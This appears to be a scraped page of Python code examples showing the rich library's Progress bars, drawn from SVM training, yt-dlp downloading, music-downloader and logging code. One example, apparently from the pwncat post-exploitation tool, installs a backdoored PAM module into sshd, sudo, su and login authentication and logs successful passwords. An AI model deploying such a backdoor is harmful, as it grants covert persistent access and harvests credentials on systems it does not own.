                        continue
                    else:
                        allSatisfied = False

                    self.__alpha[i] = alpha_1_new
                    self.__alpha[j] = alpha_2_new

                    if 0 < alpha_1_new < self.__C:
                        self.__b = b_1_new
                    elif 0 < alpha_2_new < self.__C:
                        self.__b = b_2_new
                    else:
                        self.__b = (b_1_new + b_2_new) / 2

            progress.stop_task(iterateTask)

        progress.stop()

        return
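
The progress handling in train() deals with the fact that the number of SMO passes is unknown in advance: each outer pass gets its own task sized to the number of training samples, and the task is stopped when the pass ends. An isolated sketch of that pattern, with dummy data and a dummy convergence check:

import random

from rich.progress import BarColumn, Progress

n_samples = 100
progress = Progress(
    "[progress.description]{task.description}",
    BarColumn(bar_width=None),
    "[progress.percentage]{task.completed}/{task.total}",
)
progress.start()

converged = False
iteration = 1
while not converged:
    task = progress.add_task(f"[yellow]{iteration} iterating...",
                             total=n_samples)
    for _ in range(n_samples):
        progress.update(task, advance=1)  # one step per training sample
    converged = random.random() < 0.3  # stand-in for the KKT convergence check
    progress.stop_task(task)
    iteration += 1

progress.stop()
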
コード例 #24
0
ファイル: yt_dlp_api.py プロジェクト: kkatayama/plexarr
class YouTubeDLP(object):
    """Wrapper for YouTubeDLP via yt_dlp"""
    def __init__(self):
        """Init Constructor

        From config:
            cookies (str): Path to Cookies File
        """
        config = ConfigParser()
        # config.read(os.path.join(os.path.expanduser('~'), '.config', 'plexarr.ini'))
        config.read(Path.home().joinpath(".config", "plexarr.ini"))

        self.path = config['youtube'].get('path')
        self.temp_dir = config['youtube'].get('temp_dir')
        self.cookies = config['youtube'].get('cookies')
        self.headers = None
        self.progress = Progress()
        self.task = None
        self.downloaded_bytes = 0
        self.download_status = False

    def d_hook(self, d):
        """
        SEE: https://stackoverflow.com/a/58667850/3370913

        THIS IS POLLED WHILE DOWNLOADING...
        """
        # print(d)
        if d['status'] == 'finished':
            self.download_status = False
            self.progress.stop()
            file_tuple = os.path.split(os.path.abspath(d['filename']))
            print(f'Done downloading "{file_tuple[1]}"')

        if d['status'] == 'downloading':
            if not self.download_status:
                if d.get('total_bytes'):
                    total = d["total_bytes"]
                elif d.get("total_bytes_estimate"):
                    total = d["total_bytes_estimate"]
                else:
                    total = 1
                file_tuple = os.path.split(os.path.abspath(d["filename"]))
                self.download_status = True
                self.task = self.progress.add_task(
                    f'[cyan]Downloading[/]: [yellow]"{file_tuple[1]}"[/]',
                    total=total)
                self.progress.start()

            step = int(d["downloaded_bytes"]) - int(self.downloaded_bytes)
            self.downloaded_bytes = int(d["downloaded_bytes"])
            self.progress.update(self.task, advance=step)
            # print(d['filename'], d['_percent_str'], d['_eta_str'])

    def getInfo(self, video_url='', **kwargs):
        """Info JSON"""
        self.video_url = video_url
        self.quiet = True
        self.verbose = False
        self.outtmpl = None
        self.writethumbnail = False
        self.writeinfojson = False
        self.__dict__.update(kwargs)

        if not self.video_url:
            print('[red]YOU NEED TO SET: video_url[/]')
            return

        ytdl_opts = {
            'quiet': self.quiet,
            'verbose': self.verbose,
            'overwrites': None,
            'writethumbnail': self.writethumbnail,
            'writeinfojson': self.writeinfojson,
            'noplaylist': True,
            'skip_download': True,
            'clean_infojson': False,
            'outtmpl': self.outtmpl,
            'ignoreerrors': False,
            'cookiefile': self.cookies,
            'format':
            "bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best",
            'logger': MyLogger(),
            'progress_hooks': [self.d_hook]
        }

        with yt_dlp.YoutubeDL(ytdl_opts) as ytdl:
            ytdl.add_post_processor(FinishedPP())
            data = ytdl.extract_info(self.video_url)
            info = ytdl.sanitize_info(data)
            self.data = data
            self.info = info
            return info

    def searchInfo(self, media, video, audio, query, **kwargs):
        """Search for Matching Video by MetaData"""
        self.__dict__.update(kwargs)
        vsize = video["stream_size"]
        asize = audio["stream_size"]
        width = video["width"]
        height = video["height"]
        vcodec = video["codec_id"].split("-")[0]
        acodec = audio["codec_id"].split("-")[0]

        fps = round(float(video["frame_rate"]))
        ext = media["file_extension"]
        asr = audio["sampling_rate"]

        video_format = f'bestvideo[height={height}][width={width}][ext={ext}][fps={fps}][vcodec*={vcodec}][filesize>={vsize}]'
        audio_format = f'bestaudio[acodec*={acodec}][asr={asr}][filesize>={asize}]'

        ytdl_opts = {
            'noplaylist': True,
            'ignoreerrors': True,
            'cookiefile': self.cookies,
            'default_search': 'ytsearch4',
            'skip_download': True,
            'format': f'{video_format}+{audio_format}',
            'logger': MyLogger(),
            'progress_hooks': [self.d_hook]
        }

        with yt_dlp.YoutubeDL(ytdl_opts) as ytdl:
            ytdl.add_post_processor(FinishedPP())
            msize = media["file_size"]
            results = ytdl.extract_info(query, download=False)
            self.search_results = results
            matches = [
                r for r in results["entries"] if ((r is not None) and (
                    abs(msize - r["filesize_approx"]) < 1000000))
            ]
            print(
                f'results: {len(results["entries"])}, matches: {len(matches)}')
            return matches

    def downloadVideo(self, title='', video_url='', path='', **kwargs):
        """Downlod youtube video into folder

        Args:
            title (str):     (Required) - the video title
            video_url (str): (Required) - the link of the youtube video
            path (str):      (Required) - the output directory!

        example:
            from plexarr import youtubedlp

            youtube = youtubedlp()
            youtube.downloadvideo(title=title, video_url=url, path=lib_path)

        """
        # -- setting up path configs
        self.title = title
        self.video_url = video_url
        self.path = path
        self.headers = False
        self.writethumbnail = False
        self.writeinfojson = False
        self.writesubtitles = True
        self.writeautomaticsub = False
        self.__dict__.update(kwargs)

        self.title = title
        self.path = path
        self.folder = os.path.join(self.path, self.title)
        self.f_name = os.path.join(self.path, self.title, f'{self.title}.mp4')

        # -- create fresh directory
        print(f'creating directory: "{self.folder}"')
        print(f'{{"video_url": {video_url}}}')
        os.makedirs(self.folder, exist_ok=True)

        ### Download Movie via yt-dlp ###
        ytdl_opts = {
            'writethumbnail':
            self.writethumbnail,
            'writeinfojson':
            self.writeinfojson,
            'writesubtitles':
            self.writesubtitles,
            'writeautomaticsub':
            self.writeautomaticsub,
            'subtitlesformat':
            'vtt',
            'subtitleslangs': ['en'],
            'cookiefile':
            self.cookies,
            'format':
            "bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best",
            'outtmpl':
            self.f_name,
            'postprocessors': [{
                'key': 'FFmpegMetadata',
                'add_chapters': True,
                'add_metadata': True,
            }, {
                'key': 'FFmpegSubtitlesConvertor',
                'format': 'vtt'
            }],
            'logger':
            MyLogger(),
            'progress_hooks': [self.d_hook]
        }

        if self.headers:
            yt_dlp.utils.std_headers.update(self.headers)

        with yt_dlp.YoutubeDL(ytdl_opts) as ytdl:
            # return ytdl.download_with_info_file(video_url)
            ytdl.add_post_processor(FinishedPP())
            data = ytdl.extract_info(video_url)
            info = json.dumps(ytdl.sanitize_info(data))
            self.data = data
            self.info = info
            return "Download Finished!"

    def downloadEpisode(self, url='', mp4_file='', **kwargs):
        """Downlod Episode into Season Path Folder

        Args:
            url (str):      (Required) - the video title
            mp4_file (str): (Required) - the link of the youtube video

        example:
            from plexarr import youtubedlp

            youtube = youtubedlp()
            youtube.downloadEpisode(video_url=url, mp4_file=mp4_file, format=format_quality)

        """
        # -- settings passed indirectly
        self.video_url = url
        self.f_name = mp4_file
        self.format = "bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best"
        self.headers = False

        # -- settings passed directly
        self.writethumbnail = False
        self.writeinfojson = False
        self.writesubtitles = True
        self.writeautomaticsub = False
        self.subtitlesformat = 'srt'
        self.subtitleslangs = ['en']
        self.__dict__.update(kwargs)

        # -- create fresh directory
        self.folder = Path(self.f_name).parent
        print(f'creating directory: "{self.folder}"')
        print(f'{{"video_url": {self.video_url}}}')
        # os.makedirs(self.folder, exist_ok=True)
        self.folder.mkdir(exist_ok=True)

        # -- Download Movie via yt-dlp -- #
        ytdl_opts = {
            'writethumbnail':
            self.writethumbnail,
            'writeinfojson':
            self.writeinfojson,
            'writesubtitles':
            self.writesubtitles,
            'writeautomaticsub':
            self.writeautomaticsub,
            'subtitlesformat':
            self.subtitlesformat,
            'subtitleslangs':
            self.subtitleslangs,
            'cookiefile':
            self.cookies,
            'format':
            self.format,
            'outtmpl':
            self.f_name,
            'postprocessors': [{
                'key': 'FFmpegMetadata',
                'add_chapters': True,
                'add_metadata': True,
            }, {
                'key': 'FFmpegSubtitlesConvertor',
                'format': self.subtitlesformat
            }],
            'logger':
            MyLogger(),
            'progress_hooks': [self.d_hook]
        }

        if self.headers:
            yt_dlp.utils.std_headers.update(self.headers)

        with yt_dlp.YoutubeDL(ytdl_opts) as ytdl:
            # return ytdl.download_with_info_file(video_url)
            ytdl.add_post_processor(FinishedPP())
            data = ytdl.extract_info(self.video_url)
            info = json.dumps(ytdl.sanitize_info(data))
            self.data = data
            self.info = info
            return "Download Finished!"

    def dVideo(self, title='', video_url='', path='', **kwargs):
        """Downlod youtube video into folder

        Args:
            title (str):     (Required) - the video title
            video_url (str): (Required) - the link of the youtube video
            path (str):      (Required) - the output directory!

        example:
            from plexarr import youtubedlp

            youtube = youtubedlp()
            youtube.downloadvideo(title=title, video_url=url, path=lib_path)

        """
        # -- setting up path configs
        self.title = title
        self.video_url = video_url
        self.path = path
        self.headers = False
        self.writethumbnail = False
        self.writeinfojson = False
        self.writesubtitles = True
        self.writeautomaticsub = False
        self.__dict__.update(kwargs)

        self.title = title
        self.path = path
        self.folder = self.path
        self.f_name = os.path.join(self.path, f'{self.title}.mp4')

        # -- create fresh directory
        print(f'creating directory: "{self.folder}"')
        print(f'{{"video_url": {video_url}}}')
        os.makedirs(self.folder, exist_ok=True)

        ### Download Movie via yt-dlp ###
        ytdl_opts = {
            'writethumbnail':
            self.writethumbnail,
            'writeinfojson':
            self.writeinfojson,
            'writesubtitles':
            self.writesubtitles,
            'writeautomaticsub':
            self.writeautomaticsub,
            'subtitlesformat':
            'vtt',
            'subtitleslangs': ['en'],
            'cookiefile':
            self.cookies,
            'format':
            "bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best",
            'outtmpl':
            self.f_name,
            'postprocessors': [{
                'key': 'FFmpegMetadata',
                'add_chapters': True,
                'add_metadata': True,
            }, {
                'key': 'FFmpegSubtitlesConvertor',
                'format': 'vtt'
            }],
            'logger':
            MyLogger(),
            'progress_hooks': [self.d_hook]
        }

        if self.headers:
            yt_dlp.utils.std_headers.update(self.headers)

        with yt_dlp.YoutubeDL(ytdl_opts) as ytdl:
            # return ytdl.download_with_info_file(video_url)
            ytdl.add_post_processor(FinishedPP())
            data = ytdl.extract_info(video_url)
            info = json.dumps(ytdl.sanitize_info(data))
            self.data = data
            self.info = info
            return "Download Finished!"
コード例 #25
0
    def install(self, user: Optional[str] = None):
        """ Install the persistence method """

        if pwncat.victim.current_user.id != 0:
            raise PersistenceError("must be root")

        try:
            # Enumerate SELinux state
            selinux = pwncat.victim.enumerate.first("system.selinux").data
            # If enabled and enforced, it will block this from working
            if selinux.enabled and "enforc" in selinux.mode:
                raise PersistenceError("selinux is currently in enforce mode")
            elif selinux.enabled:
                # If enabled but permissive, it will log this module
                console.log(
                    "[yellow]warning[/yellow]: selinux is enabled; persistence may be logged"
                )
        except ValueError:
            # SELinux not found
            pass

        # We use the backdoor password. Build the string of encoded bytes
        # These are placed in the source like: char password_hash[] = {0x01, 0x02, 0x03, ...};
        password = hashlib.sha1(
            pwncat.victim.config["backdoor_pass"].encode("utf-8")
        ).digest()
        password = "******".join(hex(c) for c in password)

        # Insert our key
        sneaky_source = self.sneaky_source.replace("__PWNCAT_HASH__", password)

        # Insert the log location for successful passwords
        sneaky_source = sneaky_source.replace("__PWNCAT_LOG__", "/var/log/firstlog")

        progress = Progress(
            "installing pam module",
            "•",
            "[cyan]{task.fields[status]}",
            transient=True,
            console=console,
        )
        task = progress.add_task("", status="initializing")

        # Write the source
        try:
            progress.start()

            progress.update(task, status="compiling shared library")

            try:
                # Compile our source for the remote host
                lib_path = pwncat.victim.compile(
                    [io.StringIO(sneaky_source)],
                    suffix=".so",
                    cflags=["-shared", "-fPIE"],
                    ldflags=["-lcrypto"],
                )
            except (FileNotFoundError, CompilationError) as exc:
                raise PersistenceError(f"pam: compilation failed: {exc}")

            progress.update(task, status="locating pam module installation")

            # Locate the pam_deny.so to know where to place the new module
            pam_modules = "/usr/lib/security"
            try:
                results = (
                    pwncat.victim.run(
                        "find / -name pam_deny.so 2>/dev/null | grep -v 'snap/'"
                    )
                    .strip()
                    .decode("utf-8")
                )
                if results != "":
                    results = results.split("\n")
                    pam_modules = os.path.dirname(results[0])
            except FileNotFoundError:
                pass

            progress.update(task, status=f"pam modules located at {pam_modules}")

            # Ensure the directory exists and is writable
            access = pwncat.victim.access(pam_modules)
            if (Access.DIRECTORY | Access.WRITE) in access:
                # Copy the module to a non-suspicious path
                progress.update(task, status="copying shared library")
                pwncat.victim.env(
                    ["mv", lib_path, os.path.join(pam_modules, "pam_succeed.so")]
                )
                new_line = "auth\tsufficient\tpam_succeed.so\n"

                progress.update(task, status="adding pam auth configuration")

                # Add this auth method to the following pam configurations
                for config in ["sshd", "sudo", "su", "login"]:
                    progress.update(
                        task, status=f"adding pam auth configuration: {config}"
                    )
                    config = os.path.join("/etc/pam.d", config)
                    try:
                        # Read the original content
                        with pwncat.victim.open(config, "r") as filp:
                            content = filp.readlines()
                    except (PermissionError, FileNotFoundError):
                        continue

                    # We need to know if there is a rootok line. If there is,
                    # we should add our line after it to ensure that rootok still
                    # works.
                    contains_rootok = any("pam_rootok" in line for line in content)

                    # Add this auth statement before the first auth statement
                    for i, line in enumerate(content):
                        # We either insert after the rootok line or before the first
                        # auth line, depending on if rootok is present
                        if contains_rootok and "pam_rootok" in line:
                            content.insert(i + 1, new_line)
                        elif not contains_rootok and line.startswith("auth"):
                            content.insert(i, new_line)
                            break
                    else:
                        content.append(new_line)

                    content = "".join(content)

                    try:
                        with pwncat.victim.open(
                            config, "w", length=len(content)
                        ) as filp:
                            filp.write(content)
                    except (PermissionError, FileNotFoundError):
                        continue

                pwncat.victim.tamper.created_file("/var/log/firstlog")

        except FileNotFoundError as exc:
            # A needed binary wasn't found. Clean up whatever we created.
            raise PersistenceError(str(exc))
        finally:
            progress.stop()
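
The install() method above uses a progress display with no bar at all: a fixed label plus a mutable task.fields[status] column that is updated as the installation moves through its stages. A stand-alone sketch of that status-style progress display; the stage names are examples only.

import time

from rich.console import Console
from rich.progress import Progress

console = Console()
progress = Progress(
    "installing pam module",
    "•",
    "[cyan]{task.fields[status]}",
    transient=True,
    console=console,
)
task = progress.add_task("", status="initializing")

with progress:
    for status in ("compiling shared library",
                   "locating pam module installation",
                   "adding pam auth configuration"):
        progress.update(task, status=status)
        time.sleep(0.5)
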
コード例 #26
0
class DisplayManager:
    def __init__(self):

        # ! Change color system if "legacy" windows terminal to prevent wrong colors displaying
        self.is_legacy = detect_legacy_windows()

        # ! dumb_terminals automatically handled by rich. Color system is too but it is incorrect
        # ! for legacy windows ... so no color for y'all.
        self.console = Console(
            theme=custom_theme, color_system="truecolor" if not self.is_legacy else None
        )

        self._rich_progress_bar = Progress(
            SizedTextColumn(
                "[white]{task.description}",
                overflow="ellipsis",
                width=int(self.console.width / 3),
            ),
            SizedTextColumn("{task.fields[message]}", width=18, style="nonimportant"),
            BarColumn(bar_width=None, finished_style="green"),
            "[progress.percentage]{task.percentage:>3.0f}%",
            TimeRemainingColumn(),
            console=self.console,
            # ! Normally when you exit the progress context manager (or call stop())
            # ! the last refreshed display remains in the terminal with the cursor on
            # ! the following line. You can also make the progress display disappear on
            # ! exit by setting transient=True on the Progress constructor
            transient=self.is_legacy,
        )

        self.song_count = 0
        self.overall_task_id = None
        self.overall_progress = 0
        self.overall_total = 100
        self.overall_completed_tasks = 0
        self.quiet = False

        # ! Basically a wrapper for rich's: with ... as ...
        self._rich_progress_bar.__enter__()

    def print(self, *text, color="green"):
        """
        `text` : `any`  Text to be printed to screen
        Use this self.print to replace default print().
        """

        if self.quiet:
            return

        line = ""
        for item in text:
            line += str(item) + " "

        if color:
            self._rich_progress_bar.console.print(f"[{color}]{line}")
        else:
            self._rich_progress_bar.console.print(line)

    def set_song_count_to(self, song_count: int) -> None:
        """
        `int` `song_count` : number of songs being downloaded
        RETURNS `~`
        sets the size of the progressbar based on the number of songs in the current
        download set
        """

        # ! all calculations are based of the arbitrary choice that 1 song consists of
        # ! 100 steps/points/iterations
        self.song_count = song_count

        self.overall_total = 100 * song_count

        if self.song_count > 4:
            self.overall_task_id = self._rich_progress_bar.add_task(
                description="Total",
                process_id="0",
                message=f"{self.overall_completed_tasks}/{int(self.overall_total / 100)} complete",
                total=self.overall_total,
                visible=(not self.quiet),
            )

    def update_overall(self):
        """
        Updates the overall progress bar.
        """

        # If the overall progress bar exists
        if self.overall_task_id is not None:
            self._rich_progress_bar.update(
                self.overall_task_id,
                message=f"{self.overall_completed_tasks}/{int(self.overall_total / 100)} complete",
                completed=self.overall_progress,
            )

    def new_progress_tracker(self, songObj):
        """
        returns new instance of `_ProgressTracker` that follows the `songObj` download subprocess
        """
        return _ProgressTracker(self, songObj)

    def close(self) -> None:
        """
        clean up rich
        """

        self._rich_progress_bar.stop()
コード例 #27
0
class RichLogger(object):
    """Defines a logger based on `rich.RichHandler`.

    Compared to the basic Logger, this logger will decorate the log message in
    a pretty format automatically.
    """
    def __init__(self,
                 work_dir=DEFAULT_WORK_DIR,
                 logfile_name='log.txt',
                 logger_name='logger'):
        """Initializes the logger.

        Args:
            work_dir: The work directory. (default: DEFAULT_WORK_DIR)
            logfile_name: Name of the log file. (default: `log.txt`)
            logger_name: Unique name for the logger. (default: `logger`)
        """
        self.logger = logging.getLogger(logger_name)
        if self.logger.hasHandlers():  # already exists
            raise SystemExit(
                f'Logger `{logger_name}` already exists!\n'
                f'Please use another name; otherwise the messages '
                f'from the two loggers may get mixed up.')

        self.logger.setLevel(logging.DEBUG)

        # Print log message with `INFO` level or above onto the screen.
        terminal_console = Console(file=sys.stderr,
                                   log_time=False,
                                   log_path=False)
        terminal_handler = RichHandler(level=logging.INFO,
                                       console=terminal_console,
                                       show_time=True,
                                       show_level=True,
                                       show_path=False)
        terminal_handler.setFormatter(logging.Formatter('%(message)s'))
        self.logger.addHandler(terminal_handler)

        # Save log message with all levels into log file if needed.
        if logfile_name:
            os.makedirs(work_dir, exist_ok=True)
            file_stream = open(os.path.join(work_dir, logfile_name), 'a')
            file_console = Console(file=file_stream,
                                   log_time=False,
                                   log_path=False)
            file_handler = RichHandler(level=logging.DEBUG,
                                       console=file_console,
                                       show_time=True,
                                       show_level=True,
                                       show_path=False)
            file_handler.setFormatter(logging.Formatter('%(message)s'))
            self.logger.addHandler(file_handler)

        self.log = self.logger.log
        self.debug = self.logger.debug
        self.info = self.logger.info
        self.warning = self.logger.warning
        self.error = self.logger.error
        self.exception = self.logger.exception
        self.critical = self.logger.critical

        self.pbar = None

    def print(self, *messages, **kwargs):
        """Prints messages without time stamp or log level."""
        for handler in self.logger.handlers:
            handler.console.print(*messages, **kwargs)

    def init_pbar(self, leave=False):
        """Initializes a progress bar which will display on the screen only.

        Args:
            leave: Whether to leave the trace. (default: False)
        """
        assert self.pbar is None

        # Columns shown in the progress bar.
        columns = (
            TextColumn("[progress.description]{task.description}"),
            BarColumn(bar_width=None),
            TextColumn("[progress.percentage]{task.percentage:>5.1f}%"),
            TimeColumn(),
        )

        self.pbar = Progress(*columns,
                             console=self.logger.handlers[0].console,
                             transient=not leave,
                             auto_refresh=True,
                             refresh_per_second=10)
        self.pbar.start()

    def add_pbar_task(self, name, total):
        """Adds a task to the progress bar.

        Args:
            name: Name of the new task.
            total: Total number of steps (samples) contained in the task.

        Returns:
            The task ID.
        """
        assert isinstance(self.pbar, Progress)
        task_id = self.pbar.add_task(name, total=total)
        return task_id

    def update_pbar(self, task_id, advance=1):
        """Updates a certain task in the progress bar.

        Args:
            task_id: ID of the task to update.
            advance: Number of steps advanced onto the target task. (default: 1)
        """
        assert isinstance(self.pbar, Progress)
        if self.pbar.tasks[int(task_id)].finished:
            if self.pbar.tasks[int(task_id)].stop_time is None:
                self.pbar.stop_task(task_id)
        else:
            self.pbar.update(task_id, advance=advance)

    def close_pbar(self):
        """Closes the progress bar"""
        assert isinstance(self.pbar, Progress)
        self.pbar.stop()
        self.pbar = None
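
A hypothetical usage of RichLogger's progress-bar helpers, assuming the module's custom TimeColumn and DEFAULT_WORK_DIR are available alongside the class; the work directory, task name, and step count are placeholders.

logger = RichLogger(work_dir="./logs",
                    logfile_name="log.txt",
                    logger_name="demo_logger")
logger.info("Starting evaluation")

logger.init_pbar()
task_id = logger.add_pbar_task("Evaluating", total=1000)
for _ in range(1000):
    logger.update_pbar(task_id, advance=1)
logger.close_pbar()

logger.info("Done")
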